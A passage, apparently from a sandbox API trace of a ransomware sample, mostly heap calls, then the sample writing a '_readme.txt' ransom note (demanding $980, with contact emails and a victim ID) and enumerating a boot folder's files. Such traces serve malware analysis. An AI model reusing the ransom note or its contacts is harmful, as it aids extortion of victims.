hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.853] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.853] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.853] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.853] PathFindFileNameW (pszPath="") returned="" [0200.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.853] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.854] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.854] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.854] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.854] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0200.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.854] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0200.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.855] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.855] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.855] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.856] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.856] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.856] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, 